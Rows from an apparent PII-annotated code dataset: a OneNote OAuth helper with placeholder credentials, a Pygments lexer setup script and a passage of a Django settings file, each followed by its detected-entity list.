'reservation.in'], ['URL', 'conn.mo'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc1.id'], ['URL', 'conn.ru'], ['URL', 'subnet1.id'], ['URL', 'reservation1.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc2.id'], ['URL', 'conn.ru'], ['URL', 'subnet2.id'], ['URL', 'reservation2.in'], ['URL', 'conn.ge'], ['URL', 'vpc1.id'], ['URL', 'reservations1.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'id.sh'], ['URL', 'vpc1.id'], ['URL', 'id.sh'], ['URL', 'subnet1.id'], ['URL', 'conn.ge'], ['URL', 'vpc2.id'], ['URL', 'reservations2.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'id.sh'], ['URL', 'vpc2.id'], ['URL', 'id.sh'], ['URL', 'subnet2.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'ip-10-0-0-1.ec2.int'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'network-interface.pr'], ['URL', 'ip-10-0-0-1.us-west-2.compute.int'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instances.sh'], ['URL', 'instance.id'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', 'instance.state.sh'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', '.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.re'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.re'], ['URL', 'instance.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], ['URL', 'm1.sm'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'm1.sm'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'm1.sm'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'g.id'], ['URL', '.should.be'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'instance.mo'], ['URL', 'instance.sourceDestCheck.sh'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ge'], ['URL', 'attribute.should.be'], ['URL', 'attribute.ge'], ['URL', 'data.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group.id'], ['URL', 'reservation.in'], ['URL', 'instance.gr'], ['URL', '.id.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', '.name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.in'], ['URL', 'type.sh'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.placement.sh'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'cidr.should.co'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.mo'], ['URL', 'client.ru'], ['URL', 'instance.should.co'], ['URL', 'instance.should.co'], ['URL', '.should.be.gr'], ['URL', '.should.be.gr'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'subnet.id'], ['URL', 'group1.na'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', '.id.sh'], ['URL', 'eni.id'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'instance.groups.sh'], ['URL', 'group.id'], ['URL', 'instance.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group1.id'], ['URL', 'boto.ec2.net'], ['URL', 'eni.id'], ['URL', 'conn.ru'], ['URL', 'group2.id'], ['URL', 'reservation.in'], ['URL', 'instance.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'conn.ge'], ['URL', 'enis.sh'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.su'], ['URL', 'id.sh'], ['URL', 'subnet.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'eni.pr'], ['URL', 'addresses.sh'], ['URL', 'eni.pr'], ['URL', 'address.sh'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc.id'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'conn.ru'], ['URL', 'group1.id'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'subnet.id'], ['URL', 'group2.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.at'], ['URL', 'eni.id'], ['URL', 'instance.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'instance.int'], ['URL', 'eni.id.sh'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group1.id'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 'eni.attachment.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.de'], ['URL', 'eni.attachment.id'], ['URL', 'instance.interfaces.sh'], ['URL', 'conn.ge'], ['URL', 'eni.id'], ['URL', 'eni.groups.sh'], ['URL', 'group.id'], ['URL', 'eni.gr'], ['URL', 'group2.id'], ['URL', 'conn.de'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidAttachmentID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'address.sh'], ['URL', 'name.should.co'], ['URL', 'address.re'], ['URL', 'instance.pr'], ['URL', 'address.sh'], ['URL', 'instance.pr'], ['URL', 'name.should.co'], ['URL', 'instance.pr'], ['URL', 'address.re'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.ke'], ['URL', 'name.sh'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'volume.cr'], ['URL', 'snapshot.sn'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'snapshot.sn'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'status.status.sh'], ['URL', 'status.status.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', '.id.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.de'], ['URL', 'boto3.cl'], ['URL', 'conn.ru'], ['URL', 'conn.st'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'conn.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'name.sh'], ['URL', 'conn.ge'], ['URL', 'status.sh'], ['URL', 's.id'], ['URL', 'instance1.id'], ['URL', 'status1.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance2.id'], ['URL', 'status2.st'], ['URL', 'name.sh'], ['URL', 's.id'], ['URL', 'instance3.id'], ['URL', 'status3.st'], ['URL', 'name.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'conn.ge'], ['URL', 'conn.cr'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.mo'], ['URL', 'instance.id'], ['URL', 'group.id'], ['URL', 'group.in'], ['URL', 'instance.id'], ['URL', 'boto3.re'], ['URL', 'client.cr'], ['URL', '.should.be'], ['URL', 'instance.mo'], ['URL', '.should.be'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'instance.mo'], ['URL', 'optimized.should.be'], ['URL', 'resource.cr'], ['URL', 'optimized.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', '.should.be'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'client.de'], ['URL', 'response.should.have.ke'], ['URL', 'response.should.have.ke'], ['URL', '.should.be'], ['URL', 'client.de'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'boto3.re'], ['URL', 'ec2.cr']] |
69 | """
PyOneNote.py
~~~~~~~~~~~~~~~~~
This module contains a basic OAuth 2 Authentication and basic handler for GET and POST operations.
This work was just a quick hack to migrate notes from and old database to onenote but should hep you to understand
the request structure of OneNote.
Copyright (c) 2016 Coffeemug13. All rights reserved. Licensed under the MIT license.
See LICENSE in the project root for license information.
"""
import requests
class OAuth():
"""Handles the authentication for all requests"""
def __init__(self, client_id, client_secret, code=None, token=None, refresh_token=None):
""" This information is obtained upon registration of a new Outlook Application
The values are just for information and not valid
:param client_id: "cda3ffaa-2345-a122-3454-adadc556e7bf"
:param client_secret: "AABfsafd6Q5d1VZmJQNsdac"
:param code: = "PI:KEY"
:param token: = "EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW......"
:param rtoken: = "MCKKgf55PCiM2aACbIYads*sdsa%*PWYNj436348v......" """
self.client_id = client_id
self.client_secret = client_secret
self.code = code
self.token = token
self.rtoken = refresh_token
self.redirect_uri = 'https://localhost'
self.session = requests.Session()
@staticmethod
def get_authorize_url(client_id):
"open this url in a browser to let the user grant access to onenote. Extract from the return URL your access code"
url = "https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost".format(
client_id)
return url
def get_token(self):
"""
Make the following request with e.g. postman:
POST https://login.live.com/oauth20_token.srf
Content-Type:application/x-www-form-urlencoded
grant_type:authorization_code
client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
client_secret:AABfsafd6Q5d1VZmJQNsdac
code:111111111-1111-1111-1111-111111111111
redirect_uri:https://localhost
OneNote will return as result:
{
"token_type": "bearer",
"expires_in": 3600,
"scope": "wl.signin wl.offline_access wl.basic office.onenote_create office.onenote",
"access_token": "AxxdWR1DBAAUGCCXc8wU/....",
"refresh_token": "DR3DDEQJPCiM2aACbIYa....",
"user_id": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
"""
raise NotImplementedError("")
def refresh_token(self):
"""
Make the following reqest to refresh you token with e.g. postman:
POST https://login.live.com/oauth20_token.srf
Content-Type:application/x-www-form-urlencoded
grant_type:refresh_token
client_id:cda3ffaa-2345-a122-3454-adadc556e7bf
client_secret:AABfsafd6Q5d1VZmJQNsdac
refresh_token:DR3DDEQJPCiM2aACbIYa....
redirect_uri:https://localhost
-->
{
"token_type": "bearer",
"expires_in": 3600,
"scope": "wl.signin wl.offline_access wl.basic office.onenote_create office.onenote",
"access_token": "EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW...",
"refresh_token": "DSFDSGSGFABDBGFGBFGF5435kFGDd2J6Bco2Pv2ss...",
"user_id": "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
}
"""
url = 'https://login.live.com/oauth20_token.srf'
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"grant_type": "refresh_token",
"client_id": self.client_id,
"client_secret": self.client_secret,
"refresh_token": self.rtoken,
"redirect_uri": self.redirect_uri}
result = self.session.post(url, headers=headers, data=data)
print("Refreshed token: " + result.text)
refresh = result.json()
self.expire = refresh.get('expires_in')
self.token = refresh.get('access_token')
self.rtoken = refresh.get('refresh_token')
print("Token: " + self.token)
print("Refresh Token: " + self.rtoken)
return True
def _get(self, url, query):
"""Handles GET Request with Authentication"""
headers = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
result = self.session.get(url, headers=headers, params=query)
print("GET " + result.url)
print(result.headers)
if (result.text):
print(result.text)
return result
def _post(self, url: str, headers: list, data: str = None, files: list = None):
"""Handles POST Request with Authentication"""
newHeaders = {'user-agent': 'my-app/0.0.1', 'Authorization': 'Bearer ' + self.token}
if data:
newHeaders.update(headers)
result = self.session.post(url, headers=newHeaders, data=data)
else:
result = self.session.post(url, headers=newHeaders, files=files)
# result.request.headers
print("POST " + result.url)
print(result.headers)
if (result.text):
print(result.text)
return result
def post(self, url: str, headers: list, data: str = None, files: list = None):
"""post something and handle token expire transparent to the caller"""
try:
result = self._post(url, headers, data=data, files=files)
if (result.status_code not in (200, 201)):
print("Error: " + str(result.status_code))
if (result.status_code == 401):
print("Refreshing token")
if self.refresh_token():
result = self._post(url, headers, data, files=files)
else:
print('Failed retry refreshing token')
return result
except Exception as e:
print(e)
pass
def get(self, url, query, headers=None):
"""get something and handle token expire transparent to the caller"""
try:
result = self._get(url, query)
if (result.status_code != requests.codes.ok):
print("Error: " + str(result.status_code))
if (result.status_code == 401):
print("Refreshing token")
if self.refresh_token():
result = self._get(url, query)
else:
print('Failed retry refreshing token')
return result
except Exception as e:
print(e)
pass
def get_credentials(self):
"""Return the actual credentials of this OAuth Instance
:return client_id:"""
return self.client_id, self.client_secret, self.code, self.token, self.rtoken
class OneNote(OAuth):
"""This class wraps some OneNote specific calls"""
def __init__(self, client_id, client_secret, code, token, rtoken):
super().__init__(client_id, client_secret, code, token, rtoken)
self.base = "https://www.onenote.com/api/v1.0/me/"
def list_notebooks(self):
url = self.base + "notes/notebooks"
query = {'top': '5'}
result = self.get(url, query)
n = None
if (result):
notebooks = result.json()
# result_serialized = json.dumps(result.text)
# notebook = json.loads(result_serialized)
n = notebooks["value"][0]
x = 1
return n
def post_page(self, section_id: str, created, title: str, content: str, files: list = None):
"""post a page. If you want to provide additional images to the page provide them as file list
in the same way like posting multipart message in 'requests'
.:param content: valid html text with Umlaute converted to ä"""
url = self.base + "notes/sections/" + section_id + "/pages"
headers = {"Content-Type": "application/xhtml+xml"}
# the basic layout of a page is always same
data = """<?xml version="1.0" encoding="utf-8" ?>
<html>
<head>
<title>{0}</title>
<meta name="created" content="{1}"/>
</head>
<body data-absolute-enabled="true">
<div>
{2}
</div>
</body>
</html>
""".format(title, created, content)
result = None
if files:
"post as multipart"
newFiles = [('Presentation', (None, data, 'application/xhtml+xml', {'Content-Encoding': 'utf8'}))]
newFiles.extend(files)
result = self.post(url, {}, None, files=newFiles)
else:
"post as simple request"
result = self.post(url, headers, data)
n = None
if (result):
notebooks = result.json()
# result_serialized = json.dumps(result.text)
# notebook = json.loads(result_serialized)
# n = notebooks["value"][0]
x = 1
return notebooks
| 9,316 | [['URL', 'https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost".format'], ['URL', "https://login.live.com/oauth20_token.srf'"], ['DATE_TIME', '2016'], ['PERSON', 'self.rtoken ='], ['PERSON', 'self.rtoken'], ['URL', 'self.se'], ['PERSON', 'self.rtoken'], ['URL', 'self.session.ge'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'result.st'], ['URL', 'requests.co'], ['LOCATION', 'self.base'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'self.ge'], ['PERSON', 'Umlaute'], ['LOCATION', 'self.base'], ['URL', 'self.ba'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://login.live.com/oauth20_token.srf'], ['URL', 'https://www.onenote.com/api/v1.0/me/"'], ['URL', 'PyOneNote.py'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.red'], ['URL', 'self.se'], ['URL', 'requests.Se'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'wl.si'], ['URL', 'wl.ba'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.red'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'refresh.ge'], ['URL', 'refresh.ge'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'result.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'result.st'], ['URL', 'result.st'], ['URL', 'self.re'], ['URL', 'self.cl'], ['URL', 'self.cl'], ['URL', 'self.co'], ['URL', 'self.to'], ['URL', 'self.ba']] |
70 | """pygments-sisal module setup script for distribution."""
from __future__ import with_statement
import os
import setuptools
def get_version(filename):
with open(filename) as fh:
for line in fh:
if line.startswith('__version__'):
return line.split('=')[-1].strip()[1:-1]
setuptools.setup(
name='pygments-sisal',
version=get_version(os.path.join('pygments_sisal', '__init__.py')),
author='Alexander Asp Bock',
dummy@email.com',
platforms='All',
description=('A pygments lexer for SISAL'),
install_requires=['Pygments>=2.0'],
license='MIT',
keywords='pygments, lexer, sisal',
url='https://github.com/MisanthropicBit/pygments-sisal',
packages=setuptools.find_packages(),
long_description=open('README.md').read(),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Utilities',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5'
],
# Pygments entry point
entry_points="[pygments.lexers]\n"
"sisal=pygments_sisal:SisalLexer"
)
| 1,467 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', "Asp Bock'"], ['URL', "https://github.com/MisanthropicBit/pygments-sisal',"], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'line.st'], ['URL', 'setuptools.se'], ['URL', 'os.path.jo'], ['URL', 'email.com'], ['URL', 'setuptools.fi'], ['URL', 'README.md']] |
71 | # -*- coding: utf-8 -*-
"""
Django settings for saefacto project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from os.path import join
# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings
try:
from S3 import CallingFormat
AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN
except ImportError:
# TODO: Fix this where even if in Dev this class is called.
pass
from configurations import Configuration, values
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
class Common(Configuration):
########## APP CONFIGURATION
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# 'suit',
# Admin
'django.contrib.admin',
'django.contrib.admindocs',
)
THIRD_PARTY_APPS = (
'south', # Database migration helpers:
'crispy_forms', # Form layouts
'avatar', # for user avatars
'sitetree',
'sitetree_smartadmin',
'django_user_agents',
'statici18n', # javascript
'parsley',
)
# Apps specific for this project go here.
LOCAL_APPS = (
'users', # custom users app
'core',
'main',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
INSTALLED_APPS += (
# Needs to come last for now because of a weird edge case between
# South and allauth
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
########## END APP CONFIGURATION
########## MIDDLEWARE CONFIGURATION
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django_user_agents.middleware.UserAgentMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## DEBUG
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = values.BooleanValue(False)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
# In production, this is changed to a values.SecretValue() setting
SECRET_KEY = "CHANGEME!!!"
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
join(BASE_DIR, 'fixtures'),
)
########## END FIXTURE CONFIGURATION
########## EMAIL CONFIGURATION
EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend')
########## END EMAIL CONFIGURATION
########## MANAGER CONFIGURATION
